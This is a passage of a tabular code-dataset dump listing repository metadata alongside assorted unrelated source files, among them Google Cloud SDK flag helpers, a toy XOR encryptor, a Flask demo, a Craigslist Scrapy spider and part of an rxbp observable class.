blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3b7bce198346d439703494bd74c2c46bef4a5270 | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/lib/googlecloudsdk/command_lib/deployment_manager/flags.py | d4cbf34227cc379f368deb83d40bbb690841c6b0 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 4,189 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper methods for configuring deployment manager command flags."""
from googlecloudsdk.api_lib.deployment_manager import dm_api_util
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.command_lib.util.apis import arg_utils
RESOURCES_AND_OUTPUTS_FORMAT = """
table(
resources:format='table(
name,
type:wrap,
update.state.yesno(no="COMPLETED"),
update.error.errors.group(code),
update.intent)',
outputs:format='table(
name:label=OUTPUTS,
finalValue:label=VALUE)'
)
"""
OPERATION_FORMAT = """
table(
name,
operationType:label=TYPE,
status,
targetLink.basename():label=TARGET,
error.errors.group(code),
warnings.group(code)
)
"""
DEPLOYMENT_FORMAT = """
default(
name, id, description, fingerprint,insertTime, manifest.basename(),
labels, operation.operationType, operation.progress,
operation.status, operation.user, operation.endTime, operation.startTime,
operation.error, operation.warnings, update)
"""
_DELETE_FLAG_KWARGS = {
'help_str': ('Delete policy for resources that will change as part of '
'an update or delete. `delete` deletes the resource while '
'`abandon` just removes the resource reference from the '
'deployment.'),
'default': 'delete',
'name': '--delete-policy'
}
def GetDeleteFlagEnumMap(policy_enum):
  """Return a ChoiceEnumMapper wiring --delete-policy to the given enum.

  Args:
    policy_enum: The API's delete-policy enum type to map flag choices onto.

  Returns:
    An arg_utils.ChoiceEnumMapper for the --delete-policy flag.
  """
  flag_kwargs = _DELETE_FLAG_KWARGS
  return arg_utils.ChoiceEnumMapper(
      flag_kwargs['name'],
      policy_enum,
      help_str=flag_kwargs['help_str'],
      default=flag_kwargs['default'])
def AddDeploymentNameFlag(parser):
  """Add the positional deployment name argument.

  The original docstring said "Add properties flag." — a copy-paste from
  AddPropertiesFlag; corrected here. Behavior is unchanged.

  Args:
    parser: The argparse parser to add the argument to.
  """
  parser.add_argument('deployment_name', help='Deployment name.')
def AddConfigFlags(parser):
  """Add flags for different types of configs.

  Args:
    parser: The argparse parser to add the arguments to.
  """
  # (flag, help text) pairs, registered in the original order.
  config_flag_specs = [
      ('--config',
       'Filename of a top-level yaml config that specifies '
       'resources to deploy.'),
      ('--template',
       'Filename of a top-level jinja or python config template.'),
      ('--composite-type',
       'Name of a composite type to deploy.'),
  ]
  for flag_name, flag_help in config_flag_specs:
    parser.add_argument(flag_name, help=flag_help)
def AddPropertiesFlag(parser):
  """Add the --properties key:value map flag.

  Args:
    parser: The argparse parser to add the argument to.
  """
  parser.add_argument(
      '--properties',
      dest='properties',
      type=arg_parsers.ArgDict(operators=dm_api_util.NewParserDict()),
      help='A comma separated, key:value, map '
      'to be used when deploying a template file or composite type directly.')
def AddAsyncFlag(parser):
  """Add the --async store_true flag (defaults to False).

  Args:
    parser: The argparse parser to add the argument to.
  """
  async_help = ('Return immediately and print information about the Operation '
                'in progress rather than waiting for the Operation to '
                'complete. (default=False)')
  parser.add_argument(
      '--async',
      dest='async',
      default=False,
      action='store_true',
      help=async_help)
def AddFingerprintFlag(parser):
  """Add the --fingerprint optimistic-locking flag.

  Args:
    parser: The argparse parser to add the argument to.
  """
  fingerprint_help = (
      'The fingerprint to use in requests to modify a deployment. If not '
      'specified, a get deployment request will be made to fetch the '
      'latest fingerprint. A fingerprint is a randomly generated value '
      'that is part of the update, stop, and cancel-preview request to '
      'perform optimistic locking. It is initially generated by '
      'Deployment Manager and changes after every request to modify '
      'data. The latest fingerprint is printed when deployment data is '
      'modified.')
  parser.add_argument(
      '--fingerprint',
      dest='fingerprint',
      help=fingerprint_help)
| [
"saneetk@packtpub.com"
] | saneetk@packtpub.com |
4bbf5176a2819bc143b1ee92a6c2f72dd3b570b1 | d6bf3302b826127a9d2f08bbd05947cbb9d342c6 | /symmetry_1/encrypt.py | b2978c73f33e432efc322710c5513fbf23979a6f | [] | no_license | velocitystorm/ctf-crypto-tasks | 03add82d00bbf28f45955e153d4c5585e1a2647a | 50a2ea2019bc7798a85d5bcbb6e04ebd91f9a51b | refs/heads/master | 2021-01-19T07:10:34.714655 | 2014-04-16T19:57:08 | 2014-04-16T19:57:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | #!/usr/bin/env python3
def encrypt(data, key):
    """XOR every byte of *data* with the single-byte *key*; returns bytes.

    The operation is an involution: applying it twice with the same key
    recovers the original input.
    """
    return bytes(octet ^ key for octet in data)
# Interactive CLI: read a one-character key and an ASCII message, then write
# the XOR-encrypted bytes to 'message.encrypted'.
print('Enter a key: ')
key = input()
key = ord(key[0])  # use the first character's code point as the XOR key
print('Enter a message: ')
message = input().strip().encode('ascii') # convert from str to bytes
encrypted = encrypt(message, key)
# Context manager replaces the original manual open()/close() pair so the
# file handle is released even if the write raises.
with open('message.encrypted', 'wb') as fout:
    fout.write(encrypted)
| [
"cxielamiko@gmail.com"
] | cxielamiko@gmail.com |
b3d6568aadebae72d49ae2424c19d1cd3db5d59f | c46fba793dc4c2eb4aa7886ca1b29d2c444dddb9 | /tests/test_config_validators.py | b18d531cd0c58283a79c08ca805a7ab26ac0a973 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | digideskio/vodka | 7ffcc408df3571db9bb143674db51554ddd34674 | 86a4efa0e1666902771459c8727680888026eac5 | refs/heads/master | 2021-01-12T17:49:58.576348 | 2016-10-11T09:36:40 | 2016-10-11T09:36:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | import unittest
import vodka.config.validators
class TestConfigValidators(unittest.TestCase):
    """Sanity checks for the vodka config validator helpers.

    Each validator returns a (passed, detail) pair; only the boolean
    verdict is asserted here.
    """

    def test_path_validator(self):
        # A path that exists (this test file) must validate.
        ok, _detail = vodka.config.validators.path(__file__)
        self.assertEqual(ok, True)

    def test_host_validator(self):
        # "name:port" with a numeric port is accepted.
        ok, _detail = vodka.config.validators.host("host:1")
        self.assertEqual(ok, True)
        # A bare hostname without a port is rejected.
        ok, _detail = vodka.config.validators.host("host")
        self.assertEqual(ok, False)
        # A non-numeric port is rejected.
        ok, _detail = vodka.config.validators.host("host:b")
        self.assertEqual(ok, False)
| [
"stefan@20c.com"
] | stefan@20c.com |
cd7c4627c1549a2026c52188d64d165e6a522a59 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_inspirational.py | 99cfc99ffa1a858152258d1937a20cad880aa545 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py |
#calss header
class _INSPIRATIONAL():
def __init__(self,):
self.name = "INSPIRATIONAL"
self.definitions = [u'making you feel full of hope or encouraged: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
6856f767fdb17749139555eee6cacdc1dc9e16fe | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/pronouns/_one.py | f591a8a6acc6b3fb2f2a28d9dd49ebe3efe3e975 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 645 | py |
#calss header
class _ONE():
def __init__(self,):
self.name = "ONE"
self.definitions = [u'used to refer to a particular thing or person within a group or range of things or people that are possible or available: ', u'to never do something: ', u'to like something very much: ', u'used to talk about one person or thing compared with other similar or related people or things: ', u'any person, but not a particular person: ', u'the person speaking or writing: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'pronouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
25f3d296f6e6657fadb469b39bcae1f882399891 | 8fd11d010b550144c62e2cf0ead5a89433ba56e9 | /bin/switch_kerasbackend | 24a63df2ae7d764d28adf5073bf310ea7ddd30ab | [] | no_license | Shaar68/PyShortTextCategorization | 3d47d4fc1996eab61fc8cf2ce8d37c0ef9188931 | 189a57da34c52aab1dbd8dcf4145c2dbb120f5af | refs/heads/master | 2021-04-15T18:46:47.014156 | 2017-06-16T20:59:15 | 2017-06-16T20:59:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | #!/usr/bin/env python
# Secret code. Welcome for those who find this code.
# argument parsing
import argparse
def getargparser():
    """Build the one-argument CLI parser for selecting a Keras backend."""
    backend_parser = argparse.ArgumentParser(description='Switch Keras backend')
    backend_parser.add_argument('backend', help="Backend ('theano' or 'tensorflow')")
    return backend_parser
# Parse the requested backend from the command line.
parser = getargparser()
args = parser.parse_args()
import os
import json
# Keras stores its backend choice in ~/.keras/keras.json.
homedir = os.path.expanduser('~')
kerasconfigfile = os.path.join(homedir, '.keras/keras.json')
if __name__ == '__main__':
kerasconfig = json.load(open(kerasconfigfile, 'r'))
kerasconfig['backend'] = args.backend
json.dump(kerasconfig, open(kerasconfigfile, 'w'))
print 'Keras backend set to ', args.backend | [
"stephenhky@yahoo.com.hk"
] | stephenhky@yahoo.com.hk | |
85904490e01b299c684985a2b352b9b0ad3e7072 | 8f588e8c1502d468689732969c744ccca2055106 | /Python/Programmers/Lv2/n진수게임.py | cf3b9d5062511cb56acb7c560b8dec42a700682d | [] | no_license | 5d5ng/ForCodingTest | 96751c969c2f64d547fe28fa3e14c47c2943947b | 3742c1b38bf00dd4768a9c7ea67eca68844b4a14 | refs/heads/master | 2023-01-04T14:18:40.874764 | 2020-11-02T06:15:05 | 2020-11-02T06:15:05 | 222,054,009 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | def solution(n,t,m,p):
answer = replace(n,m*t)
res = ""
for i in range(p-1,len(answer),m):
res+=answer[i]
if len(res)==t:return res
def replace(n, size):
    """Build the digit stream of 0,1,2,... written in base n.

    Numbers are rendered most-significant digit first and concatenated
    until the stream holds at least `size` digits; the digits are returned
    as a list of single-character strings (supports bases up to 16).
    """
    digit_chars = '0123456789ABCDEF'
    stream = ['0', '1']  # 0 and 1 are single digits in every base >= 2
    value = 2
    while len(stream) < size:
        # Convert `value` to base n (digits come out least-significant first).
        rendered = []
        remaining = value
        while remaining > 0:
            rendered.append(digit_chars[remaining % n])
            remaining //= n
        stream.extend(reversed(rendered))
        value += 1
    return stream
# Ad-hoc manual check. NOTE(review): these module-level n/size are not read
# by solution()/replace() above, which take their own parameters.
n = 16
size = 16
print(solution(2,4,2,1))
# num = 10
# l = []
# while(num>0):
#     temp = num%2
#     num = int(num/2)
#     l.append(temp)
# print(l)
| [
"deo1915@gmail.com"
] | deo1915@gmail.com |
46fd526660dbfc019853fabd462a7d73dbe53b03 | 07c75f8717683b9c84864c446a460681150fb6a9 | /3.Flask_cursor/days01快速入门/demo01.py | 329e98f279655b1c6e44cf5da068fc75cba4249c | [] | no_license | laomu/py_1709 | 987d9307d9025001bd4386381899eb3778f9ccd6 | 80630e6ac3ed348a2a6445e90754bb6198cfe65a | refs/heads/master | 2021-05-11T09:56:45.382526 | 2018-01-19T07:08:00 | 2018-01-19T07:08:00 | 118,088,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 858 | py | '''
Flask继承了Django和Tornado的部分优点
在高并发处理上,类似于Django通过多线程的方式实现
在编程处理上,类似于Tornado通过手工编码的方式实现web application
'''
# 引入需要的模块
from flask import Flask # 核心处理模块
# 通过当前文件构建一个app应用 ~~ 当前文件就是 web app程序的入口
app = Flask(__name__)
# 定义视图处理函数~路由+视图函数->加载到 app 中
@app.route("/") # 访问路由
def index(): # 绑定的视图函数
return "<h1>hello flask!</h1>"
@app.route("/login")
def login():
return "<h1>member login!</h1>"
@app.route("/register")
def regist():
return "<h1>member register!</h1>"
if __name__ == "__main__":
# 运行程序
app.run()
"""
路由和视图处理:
Djnago中:
Tornado中:
Flask中:
""" | [
"1007821300@qq.com"
] | 1007821300@qq.com |
b887636efed3ae71e7e0660b52fbac0e6d3d6873 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/65/usersdata/219/38632/submittedfiles/investimento.py | 3a87d2cb906049101a01605e976893fc0fa25aca | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # -*- coding: utf-8 -*-
from __future__ import division
#COMECE SEU CODIGO AQUI
deposito=float(input('Digite o deposito:'))  # initial deposit (not used below — TODO confirm)
taxa=float(input('Digite a taxa:'))  # interest rate per period
investimento=float(input('Digite o investimento:'))
# NOTE(review): the variable is named 'mês' but the loop below tests 'mes',
# which raises NameError at runtime — confirm the intended identifier.
mês=1
while mes <= 10:
investimento=investimento+taxa*investimento
print('%d/%d/%d/%d/%d/%d/%d/%d/%d/%d') | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
7ad96ac8ed482fde22e8b199d879255e63f17260 | b1d92172726262fc89f9a0c4a9e4888ebc91009e | /leetcode/easy/Interleave.py | 1c493d3f57046482b48177ea177b563573da49bb | [] | no_license | SuperMartinYang/learning_algorithm | 0c5807be26ef0b7a1fe4e09832f3ce640cd3172b | e16702d2b3ec4e5054baad56f4320bc3b31676ad | refs/heads/master | 2021-06-27T14:00:18.920903 | 2019-05-05T23:25:29 | 2019-05-05T23:25:29 | 109,798,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | def isInterleave(word1, word2, word3):
'''
word1= 'asdf'
word2 = 'sadfa'
word3 = 'assaddffa'
:param word1: str
:param word2: str
:param word3: str
:return: bool
'''
if word3 == '':
if word1 == word2 == '':
return True
else:
return False
if word1[0] == word3[0]:
return isInterleave(word1[1:], word2, word3[1:])
elif word2[0] == word3[0]:
return isInterleave(word1, word2[1:], word3[1:])
else:
return False
| [
"shy58@pitt.edu"
] | shy58@pitt.edu |
f1409870e136171b9f35c5745ceba8d628968f1d | b27b26462524984951bfbab9250abd145ecfd4c8 | /Demoing/stage_two/hawaii/craigslist_sample/craigslist_sample/spiders/craigslist_spider.py | 4a8ff1b9c951d8f06a9a0049a23b24525323045a | [] | no_license | afcarl/fastTraffickingGrab | cb813d066f1f69f359598e0b55e632dafd273c89 | 9ff274cb7c9b6c7b60d1436c209b2bfc5907267d | refs/heads/master | 2020-03-26T06:21:21.404931 | 2014-08-16T12:38:29 | 2014-08-16T12:38:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,648 | py |
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from craigslist_sample.items import CraigslistSampleItem
class CraigslistSpider(CrawlSpider):
name = "craigslist"
allowed_domains = ["craigslist.org"]
start_urls = [
"http://honolulu.craigslist.org",
"http://honolulu.craigslist.org/cas/",
"http://honolulu.craigslist.org/cas/index100.html",
"http://honolulu.craigslist.org/cas/index200.html",
"http://honolulu.craigslist.org/cas/index300.html",
"http://honolulu.craigslist.org/cas/index400.html",
"http://honolulu.craigslist.org/cas/index500.html",
"http://honolulu.craigslist.org/cas/index600.html",
"http://honolulu.craigslist.org/cas/index700.html",
"http://honolulu.craigslist.org/cas/index800.html",
"http://honolulu.craigslist.org/cas/index900.html",
"http://honolulu.craigslist.org/cas/index1000.html",
"http://honolulu.craigslist.org/cas/index1100.html",
"http://honolulu.craigslist.org/cas/index1200.html",
"http://honolulu.craigslist.org/cas/index1300.html",
"http://honolulu.craigslist.org/cas/index1400.html",
"http://honolulu.craigslist.org/cas/index1500.html",
"http://honolulu.craigslist.org/cas/index1600.html",
"http://honolulu.craigslist.org/cas/index1700.html",
"http://honolulu.craigslist.org/cas/index1800.html",
"http://honolulu.craigslist.org/cas/index1900.html",
"http://honolulu.craigslist.org/cas/index2000.html",
"http://honolulu.craigslist.org/cas/index2100.html",
"http://honolulu.craigslist.org/cas/index2200.html",
"http://honolulu.craigslist.org/cas/index2300.html",
"http://honolulu.craigslist.org/cas/index2400.html",
"http://honolulu.craigslist.org/cas/index2500.html",
"http://honolulu.craigslist.org/cas/index2600.html",
"http://honolulu.craigslist.org/cas/index2700.html",
"http://honolulu.craigslist.org/cas/index2800.html",
"http://honolulu.craigslist.org/cas/index2900.html",
"http://honolulu.craigslist.org/cas/index3000.html",
"http://honolulu.craigslist.org/cas/index3100.html",
"http://honolulu.craigslist.org/cas/index3200.html",
"http://honolulu.craigslist.org/cas/index3300.html",
"http://honolulu.craigslist.org/cas/index3400.html",
"http://honolulu.craigslist.org/cas/index3500.html",
"http://honolulu.craigslist.org/cas/index3600.html",
"http://honolulu.craigslist.org/cas/index3700.html",
"http://honolulu.craigslist.org/cas/index3800.html",
"http://honolulu.craigslist.org/cas/index3900.html",
"http://honolulu.craigslist.org/cas/index4000.html",
"http://honolulu.craigslist.org/cas/index4100.html",
"http://honolulu.craigslist.org/cas/index4200.html",
"http://honolulu.craigslist.org/cas/index4300.html",
"http://honolulu.craigslist.org/cas/index4400.html",
"http://honolulu.craigslist.org/cas/index4500.html",
"http://honolulu.craigslist.org/cas/index4600.html",
"http://honolulu.craigslist.org/cas/index4700.html",
"http://honolulu.craigslist.org/cas/index4800.html",
"http://honolulu.craigslist.org/cas/index4900.html",
"http://honolulu.craigslist.org/cas/index5000.html",
"http://honolulu.craigslist.org/cas/index5100.html",
"http://honolulu.craigslist.org/cas/index5200.html",
"http://honolulu.craigslist.org/cas/index5300.html",
"http://honolulu.craigslist.org/cas/index5400.html",
"http://honolulu.craigslist.org/cas/index5500.html",
"http://honolulu.craigslist.org/cas/index5600.html",
"http://honolulu.craigslist.org/cas/index5700.html",
"http://honolulu.craigslist.org/cas/index5800.html",
"http://honolulu.craigslist.org/cas/index5900.html",
"http://honolulu.craigslist.org/cas/index6000.html",
"http://honolulu.craigslist.org/cas/index6100.html",
"http://honolulu.craigslist.org/cas/index6200.html",
"http://honolulu.craigslist.org/cas/index6300.html",
"http://honolulu.craigslist.org/cas/index6400.html",
"http://honolulu.craigslist.org/cas/index6500.html",
"http://honolulu.craigslist.org/cas/index6600.html",
"http://honolulu.craigslist.org/cas/index6700.html",
"http://honolulu.craigslist.org/cas/index6800.html",
"http://honolulu.craigslist.org/cas/index6900.html",
"http://honolulu.craigslist.org/cas/index7000.html",
"http://honolulu.craigslist.org/cas/index7100.html",
"http://honolulu.craigslist.org/cas/index7200.html",
"http://honolulu.craigslist.org/cas/index7300.html",
"http://honolulu.craigslist.org/cas/index7400.html",
"http://honolulu.craigslist.org/cas/index7500.html",
"http://honolulu.craigslist.org/cas/index7600.html",
"http://honolulu.craigslist.org/cas/index7700.html",
"http://honolulu.craigslist.org/cas/index7800.html",
"http://honolulu.craigslist.org/cas/index7900.html",
"http://honolulu.craigslist.org/cas/index8000.html",
"http://honolulu.craigslist.org/cas/index8100.html",
"http://honolulu.craigslist.org/cas/index8200.html",
"http://honolulu.craigslist.org/cas/index8300.html",
"http://honolulu.craigslist.org/cas/index8400.html",
"http://honolulu.craigslist.org/cas/index8500.html",
"http://honolulu.craigslist.org/cas/index8600.html",
"http://honolulu.craigslist.org/cas/index8700.html",
"http://honolulu.craigslist.org/cas/index8800.html",
"http://honolulu.craigslist.org/cas/index8900.html",
"http://honolulu.craigslist.org/cas/index9000.html",
"http://honolulu.craigslist.org/cas/index9100.html",
"http://honolulu.craigslist.org/cas/index9200.html",
"http://honolulu.craigslist.org/cas/index9300.html",
"http://honolulu.craigslist.org/cas/index9400.html",
"http://honolulu.craigslist.org/cas/index9500.html",
"http://honolulu.craigslist.org/cas/index9600.html",
"http://honolulu.craigslist.org/cas/index9700.html",
"http://honolulu.craigslist.org/cas/index9800.html",
"http://honolulu.craigslist.org/cas/index9900.html"
]
rules = (Rule(SgmlLinkExtractor(allow=(),restrict_xpaths=('//a')), callback="parse", follow= True),)
def parse(self, response):
hxs = HtmlXPathSelector(response)
titles = hxs.select("//span[@class='pl']")
date_info = hxs.select("//h4[@class='ban']/span[@class='bantext']/text()")
items = []
file_to = open("things.txt","a")
file_to.write(response.body)
for titles in titles:
item = CraigslistSampleItem()
item ["title"] = titles.select("a/text()").extract()
item ["link"] = titles.select("a/@href").extract()
item ["date"] = date_info.extract()
items.append(item)
return items
| [
"ericschles@gmail.com"
] | ericschles@gmail.com |
e1e57f455f8052ec8a259620b247dbb9611debba | 71d4fafdf7261a7da96404f294feed13f6c771a0 | /mainwebsiteenv/bin/python-config | 34a5b39d2ea832da34c02d5012684422e32075af | [] | no_license | avravikiran/mainwebsite | 53f80108caf6fb536ba598967d417395aa2d9604 | 65bb5e85618aed89bfc1ee2719bd86d0ba0c8acd | refs/heads/master | 2021-09-17T02:26:09.689217 | 2018-06-26T16:09:57 | 2018-06-26T16:09:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,434 | #!/home/kiran/mainwebsite/mainwebsiteenv/bin/python
import sys
import getopt
import sysconfig
# Options always available; version-gated options are appended below.
# insert(-1, ...) keeps 'help' as the last entry in the usage string.
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
              'ldflags', 'help']
if sys.version_info >= (3, 2):
    valid_opts.insert(-1, 'extension-suffix')
    valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
    valid_opts.append('configdir')
def exit_with_usage(code=1):
    """Write a usage line listing every supported option, then exit(code)."""
    usage = "Usage: {0} [{1}]\n".format(
        sys.argv[0], '|'.join('--' + opt for opt in valid_opts))
    sys.stderr.write(usage)
    sys.exit(code)
# Parse long options only; any unknown option falls back to the usage text.
try:
    opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
    exit_with_usage()
if not opts:
    exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var  # shorthand used throughout the loop below
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
    exit_with_usage(code=0)
# Emit the requested build-configuration values, one block per selected
# option, in the order the options appeared on the command line.
for opt in opt_flags:
    if opt == '--prefix':
        print(sysconfig.get_config_var('prefix'))
    elif opt == '--exec-prefix':
        print(sysconfig.get_config_var('exec_prefix'))
    elif opt in ('--includes', '--cflags'):
        # Both options share the -I include paths; --cflags adds CFLAGS too.
        flags = ['-I' + sysconfig.get_path('include'),
                 '-I' + sysconfig.get_path('platinclude')]
        if opt == '--cflags':
            flags.extend(getvar('CFLAGS').split())
        print(' '.join(flags))
    elif opt in ('--libs', '--ldflags'):
        abiflags = getattr(sys, 'abiflags', '')
        libs = ['-lpython' + pyver + abiflags]
        libs += getvar('LIBS').split()
        libs += getvar('SYSLIBS').split()
        # add the prefix/lib/pythonX.Y/config dir, but only if there is no
        # shared library in prefix/lib/.
        if opt == '--ldflags':
            if not getvar('Py_ENABLE_SHARED'):
                libs.insert(0, '-L' + getvar('LIBPL'))
            if not getvar('PYTHONFRAMEWORK'):
                libs.extend(getvar('LINKFORSHARED').split())
        print(' '.join(libs))
    elif opt == '--extension-suffix':
        # EXT_SUFFIX is the modern name; 'SO' is the pre-3.5 fallback.
        ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
        if ext_suffix is None:
            ext_suffix = sysconfig.get_config_var('SO')
        print(ext_suffix)
    elif opt == '--abiflags':
        if not getattr(sys, 'abiflags', None):
            exit_with_usage()
        print(sys.abiflags)
    elif opt == '--configdir':
        print(sysconfig.get_config_var('LIBPL'))
| [
"me15btech11039@iith.ac.in.com"
] | me15btech11039@iith.ac.in.com | |
4b5c8b490bfaa7cd67402657c4020db410bde51b | fb7b6a0d43c524761f5251273d14f317e779c5f0 | /rxbp/observables/fromiteratorobservable.py | bd223651a12680dd7c80c263f7fb1e32727ef164 | [
"Apache-2.0"
] | permissive | MichaelSchneeberger/rxbackpressure | e7396b958d13e20377375f4b45a91a01f600595a | 470d36f729ef9dc001d0099cee45603d9c7f86a3 | refs/heads/master | 2022-08-26T10:12:05.164182 | 2022-08-21T12:21:15 | 2022-08-21T12:21:15 | 109,152,799 | 32 | 1 | Apache-2.0 | 2021-03-09T12:47:23 | 2017-11-01T16:05:20 | Python | UTF-8 | Python | false | false | 4,732 | py | from typing import Iterator, Any, Optional
from rx.disposable import Disposable, BooleanDisposable, CompositeDisposable
from rxbp.acknowledgement.continueack import ContinueAck
from rxbp.acknowledgement.operators.observeon import _observe_on
from rxbp.acknowledgement.single import Single
from rxbp.acknowledgement.stopack import StopAck
from rxbp.mixins.executionmodelmixin import ExecutionModelMixin
from rxbp.observable import Observable
from rxbp.observerinfo import ObserverInfo
from rxbp.scheduler import Scheduler
class FromIteratorObservable(Observable):
    """Observable that emits the items produced by an iterator.

    Items are pulled one at a time and pushed downstream while honouring
    the acknowledgement-based backpressure protocol: the next item is only
    emitted after the previous on_next was acknowledged (synchronously via
    ContinueAck, or asynchronously through `reschedule`).
    """
    def __init__(
            self,
            iterator: Iterator[Iterator[Any]],
            scheduler: Scheduler,
            subscribe_scheduler: Scheduler,
            on_finish: Disposable = Disposable(),
    ):
        # NOTE(review): the default Disposable() is a single shared instance
        # across all FromIteratorObservable objects; apparently harmless
        # because disposing it is a no-op, but worth confirming.
        super().__init__()
        self.iterator = iterator
        self.scheduler = scheduler
        self.subscribe_scheduler = subscribe_scheduler
        # Disposed exactly once, when the stream finishes or is cancelled.
        self.on_finish = on_finish
    def observe(self, observer_info: ObserverInfo):
        """Start emission on the subscribe scheduler; returns a disposable."""
        observer_info = observer_info.observer
        d1 = BooleanDisposable()
        def action(_, __):
            # Pull the first item; an empty iterator completes immediately.
            try:
                item = next(self.iterator)
                has_next = True
            except StopIteration:
                has_next = False
            except Exception as e:
                # stream errors
                observer_info.on_error(e)
                return Disposable()
            if not has_next:
                observer_info.on_completed()
            else:
                # start sending items
                self.fast_loop(item, observer_info, self.scheduler, d1, self.scheduler.get_execution_model(),
                               sync_index=0)
        d2 = self.subscribe_scheduler.schedule(action)
        return CompositeDisposable(d1, d2)
    def trigger_cancel(self, scheduler: Scheduler):
        """Dispose the on_finish resource, reporting (not raising) failures."""
        try:
            self.on_finish.dispose()
        except Exception as e:
            scheduler.report_failure(e)
    def reschedule(self, ack, next_item, observer, scheduler: Scheduler, disposable, em: ExecutionModelMixin):
        """Resume the emission loop once the pending ack resolves.

        A ContinueAck re-enters fast_loop with next_item; any other result
        (stop or error) cancels the stream via trigger_cancel.
        """
        class ResultSingle(Single):
            def on_next(_, next):
                if isinstance(next, ContinueAck):
                    try:
                        self.fast_loop(next_item, observer, scheduler, disposable, em, sync_index=0)
                    except Exception as e:
                        self.trigger_cancel(scheduler)
                        scheduler.report_failure(e)
                else:
                    self.trigger_cancel(scheduler)
            def on_error(_, err):
                self.trigger_cancel(scheduler)
                scheduler.report_failure(err)
        _observe_on(source=ack, scheduler=scheduler).subscribe(ResultSingle())
        # ack.subscribe(ResultSingle())
    def fast_loop(self, current_item, observer, scheduler: Scheduler,
